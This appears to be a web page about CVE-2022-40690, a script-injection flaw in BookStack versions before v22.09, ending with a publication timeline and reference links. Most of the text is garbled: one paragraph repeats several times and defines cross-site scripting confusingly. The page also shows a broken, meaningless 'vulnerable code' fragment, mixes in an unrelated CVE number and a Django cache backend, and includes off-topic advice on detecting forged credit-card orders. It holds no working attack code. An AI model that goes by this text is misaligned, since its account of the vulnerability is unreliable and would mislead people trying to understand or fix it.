CVE-2022-40690 An attacker can inject arbitrary scripts in BookStack versions prior to v22.09.

The injection occurs when a user requests an item from a different BookStack installation than the current one. The attacker must have access to the target installation via a stored cross-site request forgery attack or a malicious administrator. Cross-site scripting occurs when the application allows users to submit data to locations outside the intended location of the application. The most common type of cross-site scripting attack involves injecting malicious code into user input and redirecting that input to another location.

Injection - CVE-2022-40690

Injection occurs when a user requests an item from a different BookStack installation than the current one. The attacker must have access to the target installation via a stored cross-site request forgery attack or a malicious administrator. Cross-site scripting occurs when the application allows users to submit data to locations outside the intended location of the application. The most common type of cross-site scripting attack involves injecting malicious code into user input and redirecting that input to another location.
The injection occurs when a user requests an item from a different BookStack installation than the current one. The attacker must have access to the target installation via a stored cross-site request forgery attack or a malicious administrator. Cross-site scripting occurs when the application allows users to submit data to locations outside the intended location of the application. The most common type of cross-site scripting attack involves injecting malicious code into user input and redirecting that input to another location.

Vulnerable code: if(parent_id == 0) {

return document.getElementsByTagName('head')[0].innerHTML;

Injection - When a user requests an item from a different BookStack installation than the current on

An injection occurs when a user requests an item from a different BookStack installation than the current one. The attacker must have access to the target installation via a stored cross-site request forgery attack or a malicious administrator. Cross-site scripting occurs when the application allows users to submit data to locations outside the intended location of the application. The most common type of cross-site scripting attack involves injecting malicious code into user input and redirecting that input to another location.

CVE-2023-40691

The second injection is when an attacker uses the same credentials to access the application from another BookStack installation. The attacker must have access to the target installation via a stored cross-site request forgery attack or a malicious administrator.
There are two injections that can occur in using the current implementation of Django cache backend. One occurs when someone requests an item from a different BookStack installation than their current one, and the other occurs when someone uses the same credentials to access the application from another BookStack installation.

How to Detect Forged Orders?

To detect a forged order, your application needs to be able to confirm that the order that was placed is legitimate. This may require storing information about the user's session or other information provided by the user as they place their order. It is also important to verify the customer's billing address and contact information with their credit card company.
This can be done by cross-checking this data with existing data stored in your system.

Timeline

Published on: 10/24/2022 14:15:00 UTC
Last modified on: 10/24/2022 16:14:00 UTC

References

• https://www.bookstackapp.com/docs/admin/security/#using-bookstack-content-externally
• https://www.bookstackapp.com/blog/bookstack-release-v22-09/
• https://jvn.jp/en/jp/JVN78862034/index.html
• https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-40690